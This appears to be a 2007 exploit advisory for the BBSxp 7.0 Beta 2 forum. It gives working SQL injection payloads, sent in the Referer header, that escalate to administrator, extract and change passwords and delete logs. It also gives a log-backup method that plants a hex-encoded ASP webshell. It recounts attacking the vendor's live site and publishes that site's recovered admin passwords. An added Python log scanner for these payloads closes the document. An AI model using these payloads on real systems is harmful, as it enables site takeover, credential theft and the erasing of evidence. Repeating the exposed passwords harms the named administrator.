BBSxp 7.0 Beta 2 vulnerability

2007-02-13T00:00:00
ID MYHACK58:62200714215
Type myhack58
Reporter Anonymous
Modified 2007-02-13T00:00:00

Description

The vulnerability exists in the file setup.asp

Part one

Register -> log in -> post -> edit -> capture -> package -> promote to administrator -> change the backend password -> log in to the backend -> WEBSHELL

Here I set the password to ttfct1. The NC submission succeeded and the account was promoted to administrator. Logged in to the backend with the password ttfct1. The backup succeeded and the WEBSHELL was obtained.

There are two methods of obtaining the WEBSHELL. One: backend upload, adding htr. Two: log backup, a total of 4 steps.

Part two

Testing the official website. I have already registered; the user is sina147. Register -> log in -> post -> edit -> capture. In order not to attract the administrator's attention, we directly obtain the administrator password and the backend password, and then log in to the backend.

Sorry, there was a small problem just now, a power outage. Continuing: capture, modify. I checked, and yuzi is the administrator.

yuzi password: 5D4D89BEA718BEE10686FB053E86F13B->080532779. Backend login password: 531BC3E862F67DC2BAA871EABDE81A4F->080532449

Logged in to the backend. This file request gives a physical path, D:\www\bbs.yuzi.net\Admin_other.asp; with this, there is a chance to get a WEBSHELL. The rest of the animation was not made; I leave it to you.

OVER


Promoted to administrator: Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserRoleID=1 where username='sina'--

Get the administrator password (i.e. the primary password): Referer: http://127.0.0.1',", ",'modify post success');update bbsxp_users set UserMail= (select userpass from bbsxp_users where username='yuzi') where username='sina147'

Get the backend password (i.e. the secondary password): Referer: http://127.0.0.1',",",'modify post success');update bbsxp_users set UserMail=(select top 1 adminpassword from bbsxp_sitesettings) where username='sina147'

Change the admin password (secondary password): Referer: http://127.0.0.1',",",'modify post success');update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='sina')

Delete log: Referer: http://127.0.0.1',",",'modify post success');delete from bbsxp_log where username='sina147'

Log backup. Backup address: C:\Inetpub\wwwroot\ttfct.asp

Step 1: create table [dbo].[shit_tmp] ([cmd] [image])

Step 2: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x7900690061006F006C007500 backup log @a to disk = @s with init,no_truncate

Step 3: insert into shit_tmp values(0x3C25657865637574652872657175657374282261222929253e)

Step 4: declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C0049006E00650074007000750062005c0077007700770072006f006f0074005c00740074006600630074002e00610073007000 backup log @a to disk=@s with init,no_truncate

Step 5: Drop table [shit_tmp]
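
As a detection aid for the Referer payloads and log-backup statements listed above, the following added example (not part of the original advisory) flags web-log entries whose Referer value carries a stacked T-SQL statement. The log field layout, the sample lines, the path /forum/page.asp and the names score_referer and scan are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# A legitimate Referer is a URL. The payloads on this page instead contain a quote
# closing a SQL string literal, a ';' starting a stacked statement, and a T-SQL verb.
STACKED = re.compile(
    r"'.*;\s*(update|delete|insert|declare|create\s+table|drop\s+table|backup\s+log)\b",
    re.IGNORECASE | re.DOTALL,
)
# Tables and columns named in the page's payloads.
SENSITIVE = re.compile(
    r"bbsxp_(users|sitesettings|log)|userroleid|adminpassword|userpass", re.IGNORECASE)

def score_referer(raw):
    """Return the reasons a logged Referer value looks like SQL injection."""
    value = unquote_plus(raw)  # undo %xx encoding and '+' used for spaces
    reasons = []
    if STACKED.search(value):
        reasons.append("stacked-statement")
    if SENSITIVE.search(value):
        reasons.append("bbsxp-table")
    if value.rstrip().endswith("--"):
        reasons.append("trailing-comment")
    return reasons

def scan(lines, referer_index=6, ip_index=2, stem_index=4):
    """Return (client_ip, uri_stem, reasons) for each suspicious log line."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) <= referer_index:
            continue
        reasons = score_referer(fields[referer_index])
        if reasons:
            hits.append((fields[ip_index], fields[stem_index], reasons))
    return hits

# Constructed sample log (assumed layout, spaces logged as '+').
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(Referer)",
    "2007-02-13 10:00:01 192.0.2.10 GET /forum/page.asp 200 http://forum.example/news/update.asp?a=1;b=2",
    "2007-02-13 10:00:09 192.0.2.77 POST /forum/page.asp 200 http://127.0.0.1',\",\",'x');update+bbsxp_users+set+UserRoleID=1+where+username='u'--",
    "2007-02-13 10:00:15 192.0.2.77 POST /forum/page.asp 200 http://127.0.0.1',\",\",'x');delete+from+bbsxp_log+where+username='u'",
]

if __name__ == "__main__":
    for ip, stem, reasons in scan(SAMPLE_LOG):
        print(ip, stem, ",".join(reasons))
```

A hit here is a lead for review, not proof of compromise; the fix on the application side is to stop concatenating the Referer header into SQL text and bind it as a parameter instead.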